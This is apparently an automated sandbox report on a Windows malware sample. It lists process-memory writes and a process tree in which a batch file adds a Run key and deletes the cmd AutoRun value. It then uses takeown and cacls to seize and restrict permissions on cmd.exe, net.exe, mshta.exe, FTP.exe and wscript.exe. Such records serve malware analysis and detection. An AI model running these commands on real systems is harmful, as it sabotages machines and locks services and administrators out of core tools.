PID 4780 wrote to memory of 2544	4780	cmd.exe	102
PID 4780 wrote to memory of 2544	4780	cmd.exe	102
PID 4780 wrote to memory of 3868	4780	cmd.exe	103
PID 4780 wrote to memory of 3868	4780	cmd.exe	103
PID 4780 wrote to memory of 3868	4780	cmd.exe	103
PID 4780 wrote to memory of 3876	4780	cmd.exe	104
PID 4780 wrote to memory of 3876	4780	cmd.exe	104
PID 4780 wrote to memory of 3876	4780	cmd.exe	104
PID 4780 wrote to memory of 2244	4780	cmd.exe	105
PID 4780 wrote to memory of 2244	4780	cmd.exe	105
PID 4780 wrote to memory of 2244	4780	cmd.exe	105
PID 4780 wrote to memory of 4320	4780	cmd.exe	106
PID 4780 wrote to memory of 4320	4780	cmd.exe	106
PID 4780 wrote to memory of 4320	4780	cmd.exe	106
PID 4780 wrote to memory of 2964	4780	cmd.exe	107
PID 4780 wrote to memory of 2964	4780	cmd.exe	107
PID 4780 wrote to memory of 2964	4780	cmd.exe	107
PID 4780 wrote to memory of 4196	4780	cmd.exe	108
PID 4780 wrote to memory of 4196	4780	cmd.exe	108
PID 4780 wrote to memory of 4196	4780	cmd.exe	108
PID 4912 wrote to memory of 492	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe	109
PID 4912 wrote to memory of 492	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe	109
PID 4912 wrote to memory of 492	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe	109
PID 4912 wrote to memory of 492	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe	109
PID 4912 wrote to memory of 492	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe	109
PID 4912 wrote to memory of 492	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe	109
PID 4912 wrote to memory of 492	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe	109

C:\Users\Admin\AppData\Local\Temp\1DB0F1BC49327D3FD4527A2C58F63AAA.exe
"C:\Users\Admin\AppData\Local\Temp\1DB0F1BC49327D3FD4527A2C58F63AAA.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ipwxaakoidjaugulptjnbcgkill$-arab.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4780
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\cmd.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:716
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /g Administrators:f
    3⤵
    PID:4404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:772
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g Users:r
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d SERVICE
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3952
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d "network service"
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g system:r
    3⤵
    PID:4320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\cmd.exe /a
    3⤵
    - Modifies file permissions
    PID:2496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3088
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2528
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
    3⤵
    PID:4964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\net.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /g Administrators:f
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /g Users:r
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /g Administrators:r
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4444
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d SERVICE
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d mssqlserver
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d "network service"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d system
    3⤵
    PID:4956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:928
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\net.exe /a
    3⤵
    - Modifies file permissions
    PID:3100
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3860
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
    3⤵
    PID:3952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3308
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d system
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\net1.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /g Administrators:f
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /g Users:r
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:820
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /g Administrators:r
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d SERVICE
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d mssqlserver
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d "network service"
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d system
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\net1.exe /a
    3⤵
    - Modifies file permissions
    PID:4608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
    3⤵
    PID:372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
    3⤵
    PID:4892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3340
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
    3⤵
    PID:2232
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
    3⤵
    PID:3832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:396
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
    3⤵
    PID:3148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d system
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\mshta.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /g Administrators:f
    3⤵
    PID:4800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:368
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /g Users:r
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d SERVICE
    3⤵
    PID:3044
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d "network service"
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d system
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\mshta.exe /a
    3⤵
    - Modifies file permissions
    PID:4456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4040
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3628
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
    3⤵
    PID:4972
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d system
    3⤵
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\FTP.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3860
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /g Administrators:f
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3956
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /g Users:r
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3308
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d SERVICE
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d "network service"
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1356
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d system
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
    3⤵
    PID:4160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\FTP.exe /a
    3⤵
    - Modifies file permissions
    PID:4220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
    3⤵
    PID:820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
    3⤵
    PID:3356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
    3⤵
    PID:3224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
    3⤵
    PID:3592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d system
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
    3⤵
    PID:860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\wscript.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /g Administrators:f
    3⤵
    PID:488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /g Users:r
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2196
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d SERVICE
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3076
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d "network service"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d system
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:1092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\wscript.exe /a
    3⤵
    - Modifies file permissions
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1536
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
    3⤵
    PID:3508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d system
    3⤵
    PID:4456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
